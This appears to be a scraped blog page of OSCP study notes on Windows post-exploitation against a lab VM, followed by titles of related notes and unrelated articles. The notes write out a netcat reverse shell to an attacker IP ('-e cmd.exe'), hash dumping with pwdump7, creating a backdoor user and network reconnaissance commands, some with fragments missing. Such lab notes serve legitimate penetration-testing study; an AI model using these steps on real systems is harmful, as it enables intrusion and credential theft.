Windows Post Exploitation

Target Server: IE8-Win 7 VM

1. Download and upload the fgdump, PwDump7, wce and netcat into the IEUser folder on Windows 7.

2.Create the new user hackme with the password "password".

3.Locate fgdump and wce on Kali Linux. We can upload them to Win7 through FTP, wget, HTTP etc.

4.Estalish nc connection between Kali Linux and Windows 7.

Kali Linux

nc -nvlp

Windows 7

-nv 10.0.0.109  -e cmd.exe

We are connected now.

5.Execute the pwdump7 throuth Kali Linux.Then copy and save the result as windows file on the Desktop.

pwdump7

Show the routing table and try to find something interesting.

route print

Show the physical address and try to find something interesting.

arp -a

Show the active connections and try to find something interesting.

netstat -ano

Try to find more inreteting things as more as possible....

Post Exploitation Guide:

https://github.com/mubix/post-exploitation/wiki/Linux-Post-Exploitation-Command-List

OSCP Learning Notes - Post Exploitation(2)的更多相关文章

  1. OSCP Learning Notes - Post Exploitation(1)

    Linux Post Exploitation Target Sever: Kioptrix Level 1 1. Search the payloads types. msfvenom -l pay ...

  2. OSCP Learning Notes - Post Exploitation(4)

    Pivoting 1. Edit the virtual network settings of the Vmware. 2. Set the Network Adapter(s) of Kali L ...

  3. OSCP Learning Notes - Post Exploitation(3)

    Post-Exploit Password Attacks 1. Crack using the tool - john (Too slow in real world) Locate the roc ...

  4. OSCP Learning Notes - WebApp Exploitation(5)

    Remote File Inclusion[RFI] Prepare: Download the DVWA from the following website and deploy it on yo ...

  5. OSCP Learning Notes - WebApp Exploitation(4)

    Local File Inclusion[LFI] Target Pentester Lab: Download from the following website: https://www.vul ...

  6. OSCP Learning Notes - WebApp Exploitation(3)

    SQL Injection[SQLi] Refrence: SQL Injection Authentication Bypass Cheat Sheet https://pentestlab.blo ...

  7. OSCP Learning Notes - WebApp Exploitation(2)

    Cross-Site Scripting(XSS) 1. Using the tool - netdiscover to find the IP of target server. netdiscov ...

  8. OSCP Learning Notes - WebApp Exploitation(1)

    Installing XSS&MySQL FILE Download the Pentester Lab: XSS and MySQL FILE from the following webs ...

  9. OSCP Learning Notes - Overview

    Prerequisites: Knowledge of scripting languages(Bash/Pyhon) Understanding of basic networking concep ...

随机推荐

  1. 浅谈HTTPS和HTTP

    1.HTTP和HTTPS的基本概念 HTTP:超文本传输协议,是互联网上应用最为广泛的一种网络协议,是一个客户端和服务端请求和应答的标准,用于WWW服务器传输超文本到本地浏览器的传输协议,它可以使浏览 ...

  2. 关于 JOIN 耐心总结,学不会你打我系列

    现在随着各种数据库框架的盛行,在提高效率的同时也让我们忽略了很多底层的连接过程,这篇文章是对 SQL 连接过程梳理,并涉及到了现在常用的 SQL 标准. 其实标准就是在不同的时间,制定的一些写法或规范 ...

  3. python django 批量上传文件并绑定对应文件的描述

  4. opencv C++构造并访问单通道和多通道Mat。

    一:构造并访问单通道. int main(){ cv::Mat m=(cv::Mat_<int>(3,2)<<1,2,3,4,5,6); for(int i=0;i<m. ...

  5. 从Spring Initializr开始

    出识springcloud我们这里需要建立两个项目 来感受下微服务 一.配置服务 1. Spring Initializr. 用idea自带的 Spring Initializr. 建立第一个项目 2 ...

  6. Java容器:HashMap连环炮

    本文来源于:https://mp.weixin.qq.com/s/oRx-8XXbgage9Hf97WrDQQ, 公众号:安琪拉的博客 前言 HashMap应该算是Java后端工程师面试的必问题,因为 ...

  7. 尚学堂 215 在java中执行JavaScript代码

    package com.bjsxt.test; import java.io.FileReader; import java.net.URL; import java.util.List; impor ...

  8. 当我们创建HashMap时,底层到底做了什么?

    jdk1.7中的底层实现过程(底层基于数组+链表) 在我们new HashMap()时,底层创建了默认长度为16的一维数组Entry[ ] table.当我们调用map.put(key1,value1 ...

  9. plsql启动报 Using filter for all users can lead to poor perform

    首先,这个与Oracle配置无关,就是在使用pl/sql左侧树形目录时会看到非常多的和你当前工作无关的表,视图,序列等,导致打开速度慢. ​解决办法:Tools-->Object browser ...

  10. 谈谈javaSE中的==和equals的联系与区别

    前言 ==和equals是我们面试中经常会碰到的问题.那么它们之间有什么联系和区别呢?今天我们就来聊聊吧! 问题 这里先抛出一些比较典型笔试问题: int x = 10; int y = 10; St ...